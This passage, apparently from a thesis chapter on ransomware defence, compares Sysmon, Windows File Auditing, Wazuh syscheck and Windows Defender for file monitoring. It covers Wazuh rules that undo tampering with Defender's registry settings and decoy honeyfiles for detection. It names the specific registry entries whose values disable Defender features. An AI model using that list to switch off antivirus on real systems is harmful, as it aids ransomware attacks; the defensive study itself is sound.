Advantages and disadvantages of file monitoring with Sysmon events Advantages Disadvantages •They can be used to detect any kind of creation, modification and deletion. •They can be too complex and counter-intuitive. Following their flow requires composite rules in Wazuh. •Lack of critical information in the logs. •Real malware can be hard to tell apart from false positives. Table 6.4: Advantages and disadvantages of file monitoring with Windows File Auditing events 138 CHAPTER 6. INCREMENT 3 Advantages Disadvantages •They can be used to detect any kind of creation, modification and deletion. •Diff is supported for text files. •They always include critical information, like the filename and the program. •Real malware can be hard to tell apart from false positives. •The format of the events is not suited for field matching. •Windows Defender may identity it as a thread and stop it. Table 6.5: Advantages and disadvantages of file monitoring with Syscheck events From these tables we can conclude that: •Fast local action is more suited to antivirus than IDS, therefore it makes sense to turn to Windows Defender for this feature. Further actions can still be implemented with Wazuh active response. For the others the active response is still possible, but slower. •Windows Defender is the most attractive method to detect and stop the malware, but there are risks in only trusting Windows Defender. •Because it is hard to detect the creation of new files with the Windows File Auditing it makes sense to use the event 11 of Sysmon for this, and likewise Sysmon can not detect file deletion which this security auditing can. But both have fundamental problems with false positives. •Direct monitoring with Wazuh seems to be easier and more effective that combining Windows File Auditing with Sysmon, but it should be fundamentally slower because it needs to compare the checksum in order to detect any changes. •The Sysmon events 2 and 9 are always useful to find suspicious events with a low chance of false positives. •Windows Defender detects the attack on its own, while the others need to relate multiple events in a short period of time with Wazuh’s composite rules. Protecting Windows Defender If Windows Defender is chosen for protection against ransomware then it makes sense to improve the protection of Windows Defender because it is very targeted by attackers. This project can not afford much time on this task, but it can provide a solution for the most basic way to deactivate Windows Defender completely or just any of the features against ransomware. The easiest way for an 6.2. COMMON PATTERNS IN CRYPTO RANSOMWARE 139 attacker to do this is to use the Windows registry, therefore enabling or disabling directly the functionality in question. Access to the registry can be hardened, but in this case it is assumed that not allowing access to registry editing tools is not enough to prevent an skilled attacker from doing so. Note that blocking the access with Windows Resource Protection should make them inaccessible for both the attacker and these scripts. In the end protecting a program is a complex problem that does not only affect Windows Defender (the Wazuh agent is a similar case) and is impossible to fully solve, but measures can be taken nonetheless. There may exist better ways to undo registry changes, but none were found. The objective is to assure that certain entries never are set to 1 and that other entries are always set to 1. In the registry the value 1 often means the setting is enabled. In this scenario we assume the system has the entries with the desired values from the beginning. More specifically the entries to avoid being 1 are in HKLM\SOFTWARE\Policies \Microsoft\Windows Defender\: Spynet\SpyNetReporting DisableAntiSpyware DisableBehaviorMonitoring DisableOnAccessProtection DisableScanOnRealtimeEnable And the entries to keep their value as 1 are in HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\: EnableControlledFolderAccess ExploitGuard_ControlledFolderAccess_AllowedApplications ExploitGuard_ControlledFolderAccess_ProtectedFolders Wazuh can monitor the registry for changes, but not creation, and Windows also has auditing features that allow to monitor the registry, but Sysmon seems easier to configure. Periodic checks for changes, in case an event report was lost, can easily be done in Wazuh with the remote command feature. Other real-time checks could also be implemented, like ensuring the Windows Defender process is running as expected. Monitoring the registry for creation, deletion, value changes and renaming can be done with Sysmon events [12-14] respectively. In this case we only need to monitor a few entries C.21. These events can be a bit odd: •The Windows registry can use a temporary name for an entry, at least when manually creating one with the graphical user interface. 140 CHAPTER 6. INCREMENT 3 •There is no need to change the value in order to spawn an event 13, the execution of a change command is enough. •An entry can be created with the desired value directly, only spawning an event 13. •In the case of renaming there may not be an event of ID 14, but one of ID 13 (with the old name) followed with an event of ID 12 (with the new name). This means that the easiest way to manage them is to: •Delete or set to 0 the entries to avoid being 1. This should be triggered by any of the [12-14] events, except the event 13 when the value is set to 0 (to avoid recursion). •Create and set to 1 the entries that always should be 1. It should only happen when the entry is deleted or renamed. •Set to 1 the entries that always should be 1. It should only happen when the entry is changed. The rules to accomplish this are very simple C.22. The only detail that can lead to confusion is the use of the field tag to filter the event ID instead of using the if group tag, which is because if sid with if group interact as a logical OR, but if sid with field interact as a logical AND. These rules cover the previous cases with the active response configuration C.23. The active response command is executed on the agent that triggered the alert, running a CMD script, which runs a PowerShell script. Direct execution of PowerShell is not possible yet. This configuration is documented from C.24 to C.31. For undesired entries changing the value and the deletion can both be used. In this case the entries were grouped for both rules and active response scripts, therefore instead of executing the command for only the affected entry it is done for the whole group. This could be solved in multiple ways: •Having an alert and active response command for each entry. •Sending the affected entry name as an argument. This can not be done yet in Wazuh. •Having the final PowerShell script check manually the status to only work on the affected entry. 6.2. COMMON PATTERNS IN CRYPTO RANSOMWARE 141 None of them were implemented because they are not worth the time for the little computer power that could be saved instead of just running the script for all the related entries. The main problem with this approach is the management is harder than if it were centralized. Reducing false positives with decoys In this case the problem with detection methods other than Windows Defender’s Controlled Folder Access is there is no guarantee that the reported events are from normal and legitimate operations. There are many circumstantial solutions like: maintaining a list of allowed applications or looking for suspicious behaviour (for example many files created and later deleted in a short time). But none of them are guaranteed to always work by default. Instead a simpler approach was implemented: use decoys and look for suspicious behaviour. Because Windows Defender does not provide the filename decoy filtering can not be used with it. The deletion of files was chosen as the suspicious behaviour to detect, but mass creation of files can also be detected and identified as suspicious. Decoy files are files that appear to be normal files but should never be changed or deleted by a legitimate user. Therefore if there are such events paired with other suspicious behaviour in a short amount of time it should mean that a ransomware attack is going on. A similar option is to use a directory that contains itself in a loop, created by a special mount configuration. This has a chance to make the attack get stuck until some kind of defense mechanism is deployed. They are also known as Honeyfiles and Honeydirectories respectively[92]. These restrictions can be increased to reduce the chance of generating false positives at the risk of losing real positives. Increasing the required number of other deleted files over the minimum of two C.14, for the decoys and Wazuh composite rules, in contrast with the normal rules C.13. There are ways to hide decoy files for normal users and to automate their creation, but that is trivial and not the objective of this section. To reduce the file storage used by the decoys hard links and soft links could be used, but there is no guarantee that ransomware would treat the files exactly as the rest, therefore reducing the chance of the detection to work. In this example the decoys are just named decoy1 and decoy2 for simplification. Two decoys are used instead of only one with a complex way to duplicate its alert (like using active response), because the storage space should not be affected by this and it is easier. Decoys proved to work on testing with the encrypting script 6.1 and detection with both Windows File Auditing C.15 and Syscheck Monitoring with Wazuh